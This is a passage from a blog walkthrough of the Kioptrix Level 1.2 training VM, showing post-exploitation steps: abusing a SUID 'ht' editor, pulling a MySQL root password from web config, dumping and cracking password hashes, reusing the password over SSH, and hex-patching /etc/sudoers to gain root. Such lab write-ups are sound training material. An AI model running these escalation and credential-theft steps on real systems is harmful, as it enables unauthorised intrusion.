-rw-r--r-- 1 loneferret loneferret   586 Apr 11  2011 .profile
drwx------ 2 loneferret loneferret  4096 Apr 14  2011 .ssh
-rw-r--r-- 1 loneferret loneferret     0 Apr 11  2011 .sudo_as_admin_successful
-rw-r--r-- 1 root       root         224 Apr 16  2011 CompanyPolicy.README
-rwxrwxr-x 1 root       root       26275 Jan 12  2011 checksec.sh

cat /home/loneferret/.bash_history
sudo ht
exit

cat CompanyPolicy.README
Hello new employee,
It is company policy here to use our newly installed software for editing, creating and viewing files.
Please use the command 'sudo ht'.
Failure to do so will result in you immediate termination.

DG
CEO

/home/loneferret/checksec.sh
Usage: checksec [OPTION]

Options:

  --file &lt;executable-file&gt;
  --dir &lt;directory&gt; [-v]
  --proc &lt;process name&gt;
  --proc-all
  --proc-libs &lt;process ID&gt;
  --kernel
  --fortify-file &lt;executable-file&gt;
  --fortify-proc &lt;process ID&gt;
  --version
  --help

For more information, see:
  http://www.trapkit.de/tools/checksec.html
</code></pre>
<p>Well, that is all very interesting.  We have a couple of references to the <em>ht</em> application as well as a script, that per the [link](<a href="http://www.trapkit.de/tools/checksec.html">http://www.trapkit.de/tools/checksec.html</a> from the help dialogue, &quot;is designed to test what standard Linux OS and PaX security features are being used.&quot;  On a hunch, what if we check the security on the the ht executable?</p>
<pre><code class="language-shell-output">which ht
/usr/local/bin/ht

ls -l /usr/local/bin/ht
-rwsr-sr-x 1 root root 2072344 Apr 16  2011 /usr/local/bin/ht

ht --version
ht 2.0.18 (POSIX) 07:26:02 on Apr 16 2011
(c) 1999-2004 Stefan Weyergraf
(c) 1999-2009 Sebastian Biallas &lt;sb@biallas.net&gt;
</code></pre>
<p>First, we notice the file is owned by root and has the SUID bit set along with word-executable permissions.  This means that anyone can run this executable file and when they do, it will assume the effective UID of root (0).  Given that this appears to be an editor, I think we have found our way in.</p>
<pre><code class="language-shell-output">ht /etc/shadow

python -c 'import pty; pty.spawn(&quot;/bin/sh&quot;)'

$ ht /etc/shadow
ht /etc/shadow
Error opening terminal: unknown.

$ export TERM=xterm
export TERM=xterm

$ ht /etc/shadow
ht /etc/shadow
save_systemconfig(): error: I/O error: Permission denied

sudo -l
[sudo] password for www-data: 

</code></pre>
<p>Damn, we can't catch a break.  First, we have trouble running ht in our reverse shell.  Then, once we get past that problem, we run in to permissions issues as the <em>www-data</em> user.  I get the feeling we are supposed to be the <em>loneferret</em> user to take advantage of the ht privilege escalation.  Let's keep enumerating and see what we can find.</p>
<p>(Update: After completing more of this post realized that the permissions issue is actually related to how ht handles the setuid / setgid vs the permissions on /etc/shadow.  If we wanted to, we could have escalate privileges to root using the www-data user.)</p>
<h2 id="localenumerationpt2">Local Enumeration Pt. 2</h2>
<p>We have a shell as the <em>www-data</em> user, which means we should have full control of the web application that we compromised.  We didn't spend too much time enumerating the web app before we found the PHP exploit, so it's possible there is other functionality at play.  We now have the advantage of auditing the web app from the inside.</p>
<p>On a hunch, let's try for a quick and easy win:</p>
<pre><code class="language-shell-output">$ pwd
pwd
/home/www/kioptrix3.com
$ 

$ ls -l
ls -l
total 84
drwxrwxrwx  2 root root  4096 Apr 15  2011 cache
drwxrwxrwx  8 root root  4096 Apr 14  2011 core
drwxrwxrwx  8 root root  4096 Apr 14  2011 data
-rw-r--r--  1 root root 23126 Jun  5  2009 favicon.ico
drwxr-xr-x  7 root root  4096 Apr 14  2011 gallery
-rw-r--r--  1 root root 26430 Jan 21  2007 gnu-lgpl.txt
-rw-r--r--  1 root root   399 Feb 23  2011 index.php
drwxrwxrwx 10 root root  4096 Apr 14  2011 modules
drwxrwxrwx  3 root root  4096 Apr 14  2011 style
-rw-r--r--  1 root root   243 Aug  5  2010 update.php

$ grep password ./*
grep password ./*

$ grep password ./*/*
grep password ./*/*
./gallery/db.sql:  `password` varchar(100) NOT NULL default '',
./gallery/gconfig.php:  $GLOBALS[&quot;gallarific_mysql_password&quot;] = &quot;fuckeyou&quot;;
[... snip ...]

$ grep gallarific_mysql ./*/*
grep gallarific_mysql ./*/*
./gallery/gconfig.php:  $GLOBALS[&quot;gallarific_mysql_server&quot;] = &quot;localhost&quot;;
./gallery/gconfig.php:  $GLOBALS[&quot;gallarific_mysql_database&quot;] = &quot;gallery&quot;;
./gallery/gconfig.php:  $GLOBALS[&quot;gallarific_mysql_username&quot;] = &quot;root&quot;;
./gallery/gconfig.php:  $GLOBALS[&quot;gallarific_mysql_password&quot;] = &quot;fuckeyou&quot;;
[... snip ...]
</code></pre>
<p>Hmm, that seems helpful.  Let's see what is stored in the DB:</p>
<pre><code class="language-shell-output">$ mysql -u root -p
mysql -u root -p
Enter password: fuckeyou

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 212
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql&gt; show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema | 
| gallery            | 
| mysql              | 
+--------------------+
3 rows in set (0.00 sec)

mysql&gt; use gallery;
use gallery;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql&gt; show tables;
show tables;
+----------------------+
| Tables_in_gallery    |
+----------------------+
| dev_accounts         | 
| gallarific_comments  | 
| gallarific_galleries | 
| gallarific_photos    | 
| gallarific_settings  | 
| gallarific_stats     | 
| gallarific_users     | 
+----------------------+
7 rows in set (0.00 sec)

mysql&gt; select * from dev_accounts;
select * from dev_accounts;
+----+------------+----------------------------------+
| id | username   | password                         |
+----+------------+----------------------------------+
|  1 | dreg       | 0d3eccfb887aabd50f243b3f155c0f85 | 
|  2 | loneferret | 5badcaf789d3d1d09794d8f021f40f0e | 
+----+------------+----------------------------------+
2 rows in set (0.00 sec)

mysql&gt; select * from gallarific_users;
select * from gallarific_users;
+--------+----------+----------+-----------+-----------+----------+-------+------------+---------+-------------+-------+----------+
| userid | username | password | usertype  | firstname | lastname | email | datejoined | website | issuperuser | photo | joincode |
+--------+----------+----------+-----------+-----------+----------+-------+------------+---------+-------------+-------+----------+
|      1 | admin    | n0t7t1k4 | superuser | Super     | User     |       | 1302628616 |         |           1 |       |          | 
+--------+----------+----------+-----------+-----------+----------+-------+------------+---------+-------------+-------+----------+
1 row in set (0.00 sec)
</code></pre>
<p>Most interesting here is the password hash for loneferret in the dev_accounts table.  Users are known to reuse passwords, so if we can crack this hash, we may be able to use the password to SSH to the target as the loneferret user.</p>
<h2 id="passwordhashcracking">Password Hash Cracking</h2>
<p>Instead of cracking locally, let's see if any of the online hash-crackers can help us:<br>
<img src="https://blog.rootshellz.com/content/images/2017/09/CrackStation-starwars-1.png" alt="CrackStation-starwars-1"></p>
<p>Awesome, <a href="https://crackstation.net/">CrackStation</a> was able to easily crack loneferret's password.</p>
<h2 id="becomingloneferret">Becoming loneferret</h2>
<p>We now have the lonferret user's Gallerific web application password, but that doesn't seem to help us much in getting root on the box.  However, maybe the user reused the same password for his local account on the server.  Let's find out:</p>
<pre><code class="language-shell-output">root@kali:~# ssh loneferret@172.16.2.132
loneferret@172.16.2.132's password: [starwars]
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686
[... snip ...]
loneferret@Kioptrix3:~$ whoami
loneferret

loneferret@Kioptrix3:~$ id
uid=1000(loneferret) gid=100(users) groups=100(users)

loneferret@Kioptrix3:~$ sudo -l
User loneferret may run the following commands on this host:
    (root) NOPASSWD: !/usr/bin/su
    (root) NOPASSWD: /usr/local/bin/ht
</code></pre>
<p>Very nice, loneferret did in fact reuse his password so we are able to SSH to the server using his accounnt.  This is an example of why password reuse is bad.</p>
<p>We can also see that loneferret is able to run the ht application as root using the sudo command, but cannot run anything else using sudo.  If you remember what we found out about the ht program earlier, you will recognize that being able to run ht as root via sudo is somewhat moot, as the file is world-executable, is owned by root, and has the setuid bit turned on.  This means running when we execute ht, even without sudo, the program will be running as root.  There are some cases where sudo ht will let us edit files ht can't but either way will get us root.</p>
<h2 id="gettingroot">Getting root</h2>
<p>Since ht is an editor and we are able to use it to edit any file as root, we have a lot of options here for privilege escalation.  We can now access /etc/shadow by running <code>sudo ht /etc/shadow</code>, but let's try something else instead.  We will go after sudo itself.</p>
<p>From our enumeration, we know there are entries in the /etc/sudoers for the loneferret user.  To get root, we will update /etc/sudoers to allow us to run everything with sudo, including su (i.e. <code>sudo su -</code>).</p>
<p>Let's edit the file:</p>
<pre><code class="language-shell-output">loneferret@Kioptrix3:~$ ls -l /etc/sudoers
-r--r----- 1 root root 614 2017-09-10 20:29 /etc/sudoers

loneferret@Kioptrix3:~$ cat /etc/sudoers
cat: /etc/sudoers: Permission denied

loneferret@Kioptrix3:~$ ht /etc/sudoers
Error opening terminal: xterm-256color.

loneferret@Kioptrix3:~$ export TERM=xterm
loneferret@Kioptrix3:~$ ht /etc/sudoers

loneferret@Kioptrix3:~$ ht /etc/sudoers
</code></pre>
<p>Even though we shouldn't have permission to read the sudoers file, using the setuid / setgid ht executable, we are able to load the file.<br>
<img src="https://blog.rootshellz.com/content/images/2017/09/ht-sudoers-before.png" alt="ht-sudoers-before"></p>
<p>Now let's do some hex patching.  We want to change</p>
<pre><code class="language-hexdump">│00000130 65 66 65 72 72 65 74 20-41 4c 4c 3d 4e 4f 50 41 |eferret ALL=NOPA|│
│00000140 53 53 57 44 3a 20 21 2f-75 73 72 2f 62 69 6e 2f |SSWD: !/usr/bin/|│
│00000150 73 75 2c 20 2f 75 73 72-2f 6c 6f 63 61 6c 2f 62 |su, /usr/local/b|│
│00000160 69 6e 2f 68 74 0a 0a 23-20 55 6e 63 6f 6d 6d 65 |in/ht??# Uncomme||
</code></pre>
<p><code>loneferret ALL=NOPASSWD: !/usr/bin/su, /usr/local/bin/ht</code></p>
<p>to</p>
<pre><code class="language-hexdump">│00000130 65 66 65 72 72 65 74 20-41 4c 4c 3d 28 41 4c 4c |eferret ALL=(ALL|│
│00000140 29 20 41 4c 4c 0a 23 2f-75 73 72 2f 62 69 6e 2f |) ALL?#/usr/bin/|│
│00000150 73 75 2c 20 2f 75 73 72-2f 6c 6f 63 61 6c 2f 62 |su, /usr/local/b|│
│00000160 69 6e 2f 68 74 0a 0a 23-20 55 6e 63 6f 6d 6d 65 |in/ht??# Uncomme|│
</code></pre>
<p><code>loneferret ALL=(ALL) ALL</code><br>
<code>#/usr/bin/su, /usr/local/bin/ht</code></p>
<p>This will effectively give us full, root access to the target, as we will be able to run any command as root using sudo.</p>
<p>Let's make the change and save the file using ht:<br>
<img src="https://blog.rootshellz.com/content/images/2017/09/ht-sudoers-after.png" alt="ht-sudoers-after"></p>
<p>After saving the file, let's see if we win:</p>
<pre><code class="language-shell-output">loneferret@Kioptrix3:~$ sudo -l
[sudo] password for loneferret: 
User loneferret may run the following commands on this host:
    (ALL) ALL

loneferret@Kioptrix3:~$ sudo su -

root@Kioptrix3:~# whoami
root

root@Kioptrix3:~# id
uid=0(root) gid=0(root) groups=0(root)
root@Kioptrix3:~# 
</code></pre>
<p>Woot, woot!  There is is, we have a root shell on our target!</p>
<h1 id="enumeratinggoodies">Enumerating Goodies</h1>
<p>Now that we are root, let's see what we can find on the box:</p>
<pre><code class="language-shell-output">root@Kioptrix3:~# cd /root

root@Kioptrix3:~# ls -l
total 16
-rw-r--r--  1 root root  1327 2011-04-16 08:13 Congrats.txt
drwxr-xr-x 12 root root 12288 2011-04-16 07:26 ht-2.0.18

root@Kioptrix3:~# cat Congrats.txt 
Good for you for getting here.
Regardless of the matter (staying within the spirit of the game of course)
you got here, congratulations are in order. Wasn't that bad now was it.

Went in a different direction with this VM. Exploit based challenges are
nice. Helps workout that information gathering part, but sometimes we
need to get our hands dirty in other things as well.
Again, these VMs are beginner and not intented for everyone. 
Difficulty is relative, keep that in mind.

The object is to learn, do some research and have a little (legal)
fun in the process.


I hope you enjoyed this third challenge.

Steven McElrea
aka loneferret
http://www.kioptrix.com


Credit needs to be given to the creators of the gallery webapp and CMS used
for the building of the Kioptrix VM3 site.

Main page CMS: 
http://www.lotuscms.org

Gallery application: 
Gallarific 2.1 - Free Version released October 10, 2009
http://www.gallarific.com
Vulnerable version of this application can be downloaded
from the Exploit-DB website:
http://www.exploit-db.com/exploits/15891/

The HT Editor can be found here:
http://hte.sourceforge.net/downloads.html
And the vulnerable version on Exploit-DB here:
http://www.exploit-db.com/exploits/17083/


Also, all pictures were taken from Google Images, so being part of the
public domain I used them.
</code></pre>
<h1 id="conclusion">Conclusion</h1>
<p>Well, that's it for this challenge.  However, looking back on where we ended up, I am almost certain there are other ways to crack this VM.  For example, I imagine there is a SQL injection I missed on the web application that would have led us to the loneferret password hash in the database without first exploiting the LotusCMS RCE vulnerability.  I might go back and try to find this later.  Alternatively if there was another way to find the loneferret username, an SSH brute force using the rockyou password list would have been successful:</p>
<pre><code class="language-shell-output">root@kali:~# grep ^starwars$ /usr/share/wordlists/rockyou.txt 
starwars
</code></pre>
<p>This just goes to show, both on challenge VMs and real world servers, there is usually more than one way to pop the box.</p>
<p>Until next time, stay root my friends!</p>
<!--kg-card-end: markdown-->
        </section>
        
        <div id="disqus_thread"></div>
        <div id="disqus_thread"></div>
        <script>
        var disqus_config = function () {
            this.page.url = "https://blog.rootshellz.com/kioptrix-walkthrough-3/";
            this.page.identifier = "ghost-59a7a2d547fd8c0333677ac4"
        };
        (function() {
        var d = document, s = d.createElement('script');
        s.src = 'https://rootshellz.disqus.com/embed.js';
        s.setAttribute('data-timestamp', +new Date());
        (d.head || d.body).appendChild(s);
        })();
        </script>
        <noscript>Please enable JavaScript to view the <a href="http://disqus.com/?ref_noscript">comments powered by Disqus.</a></noscript>
        <a href="http://disqus.com" class="dsq-brlink">comments powered by <span class="logo-disqus">Disqus</span></a>
        

        <footer class="post-footer">


            <section class="share">
                <h4>Share this</h4>
                <a class="icon-twitter" href="http://twitter.com/share?text=Kioptrix: Level 1.2 (#3) Walkthrough&url=https://blog.rootshellz.com/kioptrix-walkthrough-3/"
                    onclick="window.open(this.href, 'twitter-share', 'width=550,height=235');return false;">
                    <span class="hidden">Twitter</span>
                </a>
                <a class="icon-facebook" href="https://www.facebook.com/sharer/sharer.php?u=https://blog.rootshellz.com/kioptrix-walkthrough-3/"
                    onclick="window.open(this.href, 'facebook-share','width=580,height=296');return false;">
                    <span class="hidden">Facebook</span>
                </a>
                <a class="icon-google-plus" href="https://plus.google.com/share?url=https://blog.rootshellz.com/kioptrix-walkthrough-3/"
                   onclick="window.open(this.href, 'google-plus-share', 'width=490,height=530');return false;">
                    <span class="hidden">Google+</span>
                </a>
            </section>

        </footer>


    </article>

</main>


    <footer class="site-footer">
        <!-- <a class="subscribe icon-feed" href="https://blog.rootshellz.com/rss/"><span class="tooltip">Subscribe!</span></a> -->
        <div class="inner">
             <section class="copyright">All content copyright <a href="/">rootshellz</a> &copy; 2021 &bull; All rights reserved.</section>
             <section class="poweredby">Proudly published with <a class="icon-ghost" href="http://ghost.org"><span class="icon-ghost-text">Ghost</span></a> in <a href="https://github.com/mityalebedev/The-Shell">The Shell</a> theme.</section>
        </div>
    </footer>

    <!-- https://cdnjs.com/libraries/prism -->
<script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.22.0/prism.min.js"></script>

    <script type='text/javascript' src="/assets/highlighter/prettify.js?v=2f125e8a2a"></script>
    <script type='text/javascript' src="/assets/js/shell.js?v=2f125e8a2a"></script>
</body>
</html>